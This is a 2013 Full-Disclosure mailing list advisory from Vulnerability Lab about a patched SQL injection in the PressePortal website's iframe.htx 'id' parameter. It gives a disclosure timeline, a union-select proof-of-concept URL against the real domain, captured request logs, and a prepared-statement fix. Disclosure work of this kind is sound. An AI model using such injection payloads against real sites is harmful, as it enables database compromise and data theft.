[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability
From:       Vulnerability Lab <research () vulnerability-lab ! com>
Date:       2013-11-28 17:42:47
Message-ID: 52978097.2080008 () vulnerability-lab ! com
[Download RAW message or body]

Document Title:
===============
NewsAktuell PressePortal DE - Remote SQL Injection Web Vulnerability


References (Source):
====================
http://vulnerability-lab.com/get_content.php?id=1150

Lab News Article: http://www.vulnerability-lab.com/news/get_news.php?id=115


Release Date:
=============
2013-11-28


Vulnerability Laboratory ID (VL-ID):
====================================
1150


Common Vulnerability Scoring System:
====================================
8.7


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a critical SQL Injection web \
vulnerability in the official News-Aktuell - PressePortal website web-application.


Vulnerability Disclosure Timeline:
==================================
2013-04-26:	Researcher Notification & Coordination (Marco Onorati)
2013-05-01:	Vendor Notification (PressePortal Team)
2013-11-28:	Vendor Response/Feedback(PressePortal Team)
2013-11-28:	Vendor Fix/Patch (PressePortal Developer Team)
2013-11-29:	Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official News-Aktuell - \
PressePortal website web-application. The vulnerability allows remote attacker to execute own \
sql commands by usage of a vulnerable application value GET method request.

The vulnerability is located in the `../services/content` module with the vulnerable iframe.htx \
file. Remote attackers are able  to inject own sql commands by usage of the vulnerable `id` \
parameter. After the inject the website returns with a a obviously  blank page but when you \
watch the source the execute is in the listed rss and context values. The issue is a classic \
remote sql  injection. The security risk of the remote sql injection web vulnerability is \
estimated as critical with a cvss (common vulnerability  scoring system) count of 8.7(+).

Exploitation of the sql injection web vulnerability requires no privileged web application user \
account and also no user interaction.  Successful exploitation of the vulnerability results in \
web application (website), account system & dbms compromise.

Vulnerable Module(s):
				[+] services/content

Vulnerable File(s):
				[+] iframe.htx

Vulnerable Parameter(s):
				[+] id

Affected Domain(s):
				[+] http://www.presseportal.de


Proof of Concept (PoC):
=======================
The remote sql injection web vulnerability can be exploited by remote attackers without user \
interaction and also without privileged  web application user account. For security \
demonstration or to reproduce the vulnerability follow the provided information and steps \
below.



PoC: Remote SQL Injection
http://www.presseportal.de/services/content/iframe.htx?id=b17ea41fbd7d93bcdda63799dd904314%27%20 \
%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,
 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true


-- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://www.presseportal.de/services/content/iframe.htx
?id=b17ea41fbd7d93bcdda63799dd904314%27%20%20and%201=2%20%20union%20select%201,2,3,4,5,6,7,8,@@version,10,11,12,13,14,15,16,17,18,19,20,21,22,
 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60%20+--+%20&inc=true \
 Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] 
Content Size[3145] Mime Type[text/html]
   

Request Headers:
Host[www.presseportal.de]
User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[en-US,en;q=0.5]
Accept-Encoding[gzip, deflate]
DNT[1]
Cookie[PHPSESSID=emou1lkl2c3vin16agjg90eig1; 
PressePortalDeDst=portal6-pp.de; 
__utma=239002817.282394538.1385649109.1385649109.1385649109.1; 
__utmb=239002817.4.10.1385649109; __utmc=239002817; \
__utmz=239002817.1385649109.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);  __atuvc=2%7C48; \
POPUPCHECK=1385735515782] Connection[keep-alive]
Cache-Control[max-age=0]
   

Response Headers:
Date[Thu, 28 Nov 2013 14:52:27 GMT]
Server[Apache]
X-Powered-By[PHP/5.3.27]
Expires[Thu, 19 Nov 1981 08:52:00 GMT]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Pragma[no-cache]
Content-Type[text/html]
Content-Length[3145]
Connection[Keep-alive]
Via[1.1 AN-0003011040777600]




Refernce(s):
http://www.presseportal.de/services/content/iframe.htx?id
https://www.presseportal.de/services/content/iframe.htx?id


Picture(s):
				../1.png
				../2.png
				../3.png


Resource(s):
				../iframe.htx.htm


Solution - Fix & Patch:
=======================
The vulnerability can be patched by usage of a secure (prepared) statement in the id GET method \
request of the iframe.htx file.


Security Risk:
==============
The security risk of the remote sql injection web vulnerability is estimated as critical.
The vulnerability allows attackers to compromise the application, web-server and service dbms.


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Marco Onorati (m.onorati@web.de) \
[www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties,  either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or \
its suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business  profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some  states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation  may not apply. We do not approve or encourage anybody to break any vendor licenses, \
policies, deface websites, hack into databases  or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - \
                admin@evolution-sec.com
Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - \
                magazine.vulnerability-db.com
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - \
                youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - \
vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory.  Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other  media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and  other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list (feed),  modify, use \
or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to \
get a permission.

				Copyright © 2013 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic